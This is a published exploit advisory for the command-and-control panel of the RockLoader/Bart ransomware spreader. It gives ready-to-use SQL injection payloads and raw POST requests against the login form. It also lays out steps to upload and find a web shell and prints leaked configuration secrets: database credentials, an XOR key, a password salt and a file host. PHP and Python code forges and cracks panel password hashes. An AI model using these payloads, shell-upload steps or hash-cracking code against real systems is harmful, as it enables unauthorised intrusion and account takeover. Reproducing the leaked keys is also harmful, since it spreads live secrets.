RockLoader SQL Injection / Shell Upload

30 Jun 2016 | Reported by Danail Velev | Type: packetstorm | Source: packetstormsecurity.com

RockLoader SQL Injection & Shell Upload, Bart malware, remote SQL injection, C&C server, webapp security, file upload vulnerability

# Exploit Title: RockLoader aka Bart Malware [SQLi] and shell file upload
# Date: 27-06-2016  
# Software Link Leak: https://github.com/colocation/RockLoader-source  
# Exploit Author: Danail Velev  
# Contact: ICQ: 209030 / [email protected]  
# Website: http://colocation.bg/  
# Category: webapps / malware / private software / infection spreader / C&C
# Inspiration: http://www.xylibox.com/  
  
1. Description  
  
In recent days a new Bart aka RockLoader malware/ransomware spreader has become active.
My family was a victim of this type of extortion last year.
  
2. Short info: SQL Injections

No user registration required (the injection sits in the pre-authentication login handler).
The Command and Control server that processes the spread requests and user
tasks, and is responsible for the whole process, suffers from multiple remote
SQL injections.
The common C&C server path is "/cp/login/" in most setups.
Given the specifics of the spreader, its functionality, encryption methods and
working process, there is the possibility of RCE, MSF/CMD injection and local
root post-exploitation.
  
In common cases the setup comes with these specific configs:
- the database user has full privileges on the host SQL server.
- local file read is available in most conditions.
- the database user is database administrator in most conditions.
- database name and structure are identical across installs, since it comes as a
phpMyAdmin dump.
- file write and read is a must for the panel to work.
- user screen capture plugin on advanced setups.
- default database name is 'appdater'.
  
  
3. Proof of Concept:  
  
Affected parameters are "username" and "password", sent in a specific POST
request (an XMLHttpRequest to /cp/login/).
The third parameter is the PHP session cookie (PHPSESSID).
  
----=(SQL Injection 1)=----  
Type: error-based  
Method: POST  
Request Type: XMLHttpRequest  
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118 UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)-- KSxg1=6 AND 000580=000580 --
Example raw request for host 127.0.0.1 (baseline login request; put the
URL-encoded payload in the username value and update Content-Length to match):
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1  
Content-Length: 87  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: 127.0.0.1/cp/login/  
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*  
password=S0M3PaSSw0rd&username=d0na1DTrump  
-----------------END--------------------  
  
=================================================================================================================================================================  
  
POC:  
----=(SQL Injection 2)=----  
Type: AND/OR time-based blind  
Method: POST  
Request Type: XMLHttpRequest  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND 000580=000580 --
Example raw request for host 127.0.0.1 (baseline login request; put the
URL-encoded payload in the username value and update Content-Length to match):
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1  
Content-Length: 87  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: 127.0.0.1/cp/login/  
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*  
password=S0M3PaSSw0rd&username=d0na1DTrump  
-----------------END--------------------  
  
=================================================================================================================================================================  
  
POC:  
----=(Shell Upload POC)=----  
Requirements:
- Valid user for the control panel.
- Read access to the database (or the SQL injection above).

Step 1:
Upload your shell as a new file via the Control Panel.
Name it: OWNED
Note: the filename is masked in the control panel; the panel shows the name you
gave, but stores the upload under a random name.

Step 2:
Look at the 'file' table in the 'appdater' database.
QUERY: SELECT * FROM `file`;
Look for the row with name=OWNED and its corresponding file_path value (EXAMPLE:
C932kc.php).

Step 3:
Location of your shell:
http://127.0.0.1/files/c932kc.php
  
-----------------END--------------------  
=================================================================================================================================================================  
POC:  
----=(Database user and password disclosure)=----

Example request that discloses the install directory (a PHP notice leaks the path):
  
===============================================  
POST /cp/login/ HTTP/1.1  
Content-Length: 87  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: 127.0.0.1/cp/login/  
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*  
password=S0M3PaSSw0rd&username=d0na1DTrump  
===============================================  
Response if error reporting is enabled:  
  
<br />  
<b>Notice</b>: A session had already been started - ignoring   
session_start() in <b>/var/www/html/cp/login/auth.php</b> on line   
<b>23</b><br />  
  
  
===============================================  
  
Read the settings.php file of the control panel to obtain the database user and
password.
location: /var/www/html/cp/settings.php
  
----Snip-----  
<?php  
//Debug  
ini_set('error_reporting', E_ALL); // REMOVE TO TURN DEBUG OFF  
ini_set('display_errors', 1); // REMOVE TO TURN DEBUG OFF  
  
//MySQL settings  
define('DB_HOSTNAME', 'localhost');  
define('DB_USERNAME', 'root');  
define('DB_PASSWORD', '');  
define('DB_DATABASE', 'appdater'); <- most of the time this is the default
database, since it comes in the bundle.
define('DB_PORT', '3307');  
  
......  
---EndSnip---  
=================================================================================================================================================================  
POC:  
----=(XOR encryption key and password salt disclosure)=----

Read the settings.php file (/var/www/appdater/html/settings.php; the install
path varies, the PHP notice above and APPDATER_PATH below give the real one).
Look at the global configuration for the app.
  
----Snip-----  
//GLOBAL settings  
define('XOR_KEY', 'aWL~jH9zJl$5Yfz7'); <- File encryption XOR_KEY  
define('FILES_URL', 'https://summerr554fox.su/files/'); <- address of all uploaded files
define('APPDATER_PATH', '/var/www/html/');  
define('SALT', 'KsqwGzTl?Qwq|oHA'); <- SALT KEY FOUND !  
?>  
---EndSnip---  
TADAAAA, we got the password for the SQL server and even more: the XOR_KEY for
file encryption, the location of the EXE files, the PATH to the Control Panel
and...
the most important --> THE SALT!
  
=================================================================================================================================================================  
POC:  
---=(Admin panel password generator)=---  
  
Read the core/functions.php file (/var/www/appdater/html/core/functions.php)
and look for this:
  
---Snip-----
function create_hash( $string ) {
    return substr( sha1( SALT . $string ), 3, 17 );
}
----EndSnip---

TADAAAA, so we also have the algorithm used to create valid user and password
hashes: SHA-1 over SALT concatenated with the input, keeping 17 hex characters
from offset 3. With the leaked SALT, the panel's hash for any chosen password
can be generated:

<?php
// SALT as leaked from settings.php above
define('SALT', 'KsqwGzTl?Qwq|oHA');

// Same function as in core/functions.php
function create_hash( $string ) {
    return substr( sha1( SALT . $string ), 3, 17 );
}

// Prints the hash the panel stores/compares for this password
echo create_hash('S0M3PaSSw0rd');
?>
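The same hash function ported to Python as an added example (my code, not the panel's), going one step past the advisory to show what the leaked SALT buys: with the salt known, the 17-hex-character hashes the panel stores can be generated for any chosen password (to plant a panel user through the injection or a direct database write) and cracked offline by dictionary or short brute force, because the panel does a single unstretched SHA-1 per guess. The wordlist and the "dumped" hash are constructed; the SHA-1("abc") test vector is the standard one.

```python
import hashlib
import itertools
import string

SALT = "KsqwGzTl?Qwq|oHA"  # leaked from settings.php per the advisory


def create_hash(value: str, salt: str = SALT) -> str:
    """Port of the panel's create_hash(): substr(sha1(SALT . $string), 3, 17).
    PHP substr(offset 3, length 17) is the Python slice [3:20]; PHP's sha1()
    returns lowercase hex, as hexdigest() does."""
    return hashlib.sha1((salt + value).encode()).hexdigest()[3:20]


def dictionary_attack(target: str, wordlist, salt: str = SALT):
    """Return the first candidate whose hash matches `target`, else None."""
    for candidate in wordlist:
        if create_hash(candidate, salt) == target:
            return candidate
    return None


def brute_force(target: str, alphabet: str = string.ascii_lowercase,
                max_len: int = 4, salt: str = SALT):
    """Exhaust every string up to max_len over alphabet. Cheap because one
    SHA-1 per guess (no iteration count, no per-user salt) is all the panel does."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if create_hash(candidate, salt) == target:
                return candidate
    return None


# Constructed stand-in for a row of the panel's user table: the hash the panel
# would store for the password used in the advisory's example request.
DUMPED_HASH = create_hash("S0M3PaSSw0rd")
WORDLIST = ["admin", "password", "123456", "S0M3PaSSw0rd", "rockloader"]

if __name__ == "__main__":
    print("hash for S0M3PaSSw0rd:", DUMPED_HASH)
    print("dictionary hit:", dictionary_attack(DUMPED_HASH, WORDLIST))
    print("brute-forced short password:", brute_force(create_hash("zap"), max_len=3))
```

Note that SALT is prepended with no separator, so `create_hash("bc", salt="a")` and `create_hash("abc", salt="")` are the same value; a global salt like this only defeats generic rainbow tables, and once it is read out of settings.php it offers nothing against a targeted attack.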
  
=================================================================================================================================================================  
  
  
4. Solution:
  
DO NOT WRITE BUGGY APPZ:)  
